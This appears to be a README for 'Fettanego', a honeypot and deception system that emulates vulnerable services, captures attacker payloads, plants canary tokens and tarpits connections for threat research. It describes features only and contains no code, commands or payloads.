Fettanego is not just a passive monitoring tool; it is an Active Deception Ecosystem designed to map adversary infrastructure, analyze attack patterns, and neutralize automated threats through resource exhaustion.
"The goal is not just to block the intruder, but to study them, consume their resources, and map their origins."
- Artifact Harvesting: Automatically captures, sandboxes, and analyzes payloads (ELF/SH/EXE) dropped by attackers to extract C2 (Command & Control) configurations.
- Adversary Profiling: Silent collection of attacker toolkits, "combo lists," and private wordlists used during the intrusion attempt for intelligence database generation.
- Active Deception (Psychological Layer): Traps attackers in a high-fidelity "fake" environment, presenting false assets (databases, keys) to waste their time and compute cycles.
- Infrastructure Mapping: Reverse-tracks the IP addresses and C2 nodes communicating with the captured malware samples.
Fettanego utilizes a modified, multi-layered deception engine powered by custom sensor nodes:
- Shell Emulation (SSH/Telnet): A highly interactive terminal that logs keystrokes and mimics vulnerable IoT devices or legacy servers.
- Application Sensors (Web/SQL): Emulates "juicy" targets like Log4j vulnerabilities, exposed SQL databases, and administrative panels to attract sophisticated bots.
- Tarpit Protocols: Intentionally delays network responses to keep attacker connections open indefinitely, causing Resource Exhaustion on the attacker's side.
- Payload Sandbox: Every downloaded file is isolated and statically analyzed. Extracted IPs/Domains are instantly fed into the blocklist.
- Canary Tokens & Decoys: The system plants "marked" files (fake AWS keys, database configs) within the filesystem. When an attacker exfiltrates and uses these, their true origin and location are revealed.
- Loop-Back Exploitation: If a cryptominer is detected, the system feeds it synthetic "fake work," consuming the attacker's bandwidth without generating actual hashes.
[!] DISCLAIMER: This project is strictly for educational purposes, threat research, and defensive analysis. The author is not responsible for any misuse of the provided tools.